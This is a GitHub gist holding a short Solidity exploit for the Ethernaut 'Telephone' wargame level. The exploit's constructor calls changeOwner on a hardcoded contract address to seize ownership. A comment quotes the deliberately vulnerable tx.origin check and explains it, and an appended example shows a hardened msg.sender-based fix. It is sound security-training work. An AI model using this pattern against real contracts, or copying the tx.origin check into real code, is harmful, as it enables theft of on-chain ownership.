@kiknaio
Created August 22, 2023 17:03
Created using remix-ide: Realtime Ethereum Contract Compiler and Runtime. Load this file by pasting this gists URL or ID at https://remix.ethereum.org/#version=soljson-v0.8.18+commit.87f61d96.js&optimize=false&runs=200&gist=
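// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Minimal interface for the target contract's only external function.
interface ITelephone {
  function changeOwner(address _owner) external;
}

contract HackTelephoneOnEthernatu {
  // Address of the deployed Telephone instance.
  ITelephone telephoneAddress = ITelephone(0x4536F233885184a92ddF57b6Bc86117A879C0745);

  // The call is made from the constructor, so inside Telephone msg.sender is
  // this contract while tx.origin is the deploying EOA; the two differ and
  // changeOwner assigns the new owner.
  constructor() {
    telephoneAddress.changeOwner(0x3D5a7D193f4e454BDb743488B7e70CAd51dEB683);
  }
}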
kiknaio commented Aug 22, 2023

Used this contract to hack the original contract. Original contract source code was this:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Telephone {

  address public owner;

  constructor() {
    owner = msg.sender;
  }

  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}

It uses tx.origin instead of msg.sender, so a phishing contract can impersonate the EOA (transaction sender) and do literally everything on a target contract without any additional permission.
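A hardened counterpart to the Telephone contract quoted above, as an added example that is not part of the gist or of the original contract's code. It assumes the intended policy is "only the current owner may hand over ownership"; the names HardenedTelephone, pendingOwner, acceptOwnership, the custom errors and the events are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4; // custom errors need 0.8.4 or later

// Added example: authorization is decided by msg.sender only.
// Assumption: only the current owner may start an ownership transfer.
contract HardenedTelephone {
    address public owner;
    address public pendingOwner;

    error NotOwner(address caller);
    error NotPendingOwner(address caller);
    error ZeroAddress();

    event OwnershipTransferStarted(address indexed from, address indexed to);
    event OwnershipTransferred(address indexed from, address indexed to);

    constructor() {
        owner = msg.sender;
        emit OwnershipTransferred(address(0), msg.sender);
    }

    // msg.sender is the immediate caller. A call relayed through an
    // intermediary contract arrives with msg.sender == that contract,
    // so it fails this check and reverts. tx.origin is never consulted.
    modifier onlyOwner() {
        if (msg.sender != owner) revert NotOwner(msg.sender);
        _;
    }

    // Step 1: the owner nominates a successor; ownership does not move yet.
    function changeOwner(address _owner) external onlyOwner {
        if (_owner == address(0)) revert ZeroAddress();
        pendingOwner = _owner;
        emit OwnershipTransferStarted(owner, _owner);
    }

    // Step 2: the nominee calls in directly to take ownership, which also
    // guards against handing the contract to a mistyped address.
    function acceptOwnership() external {
        if (msg.sender != pendingOwner) revert NotPendingOwner(msg.sender);
        emit OwnershipTransferred(owner, msg.sender);
        owner = msg.sender;
        delete pendingOwner;
    }
}
```

Deploying the gist's constructor-call pattern against this variant reverts with NotOwner, because the relaying contract is the msg.sender that the modifier checks.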
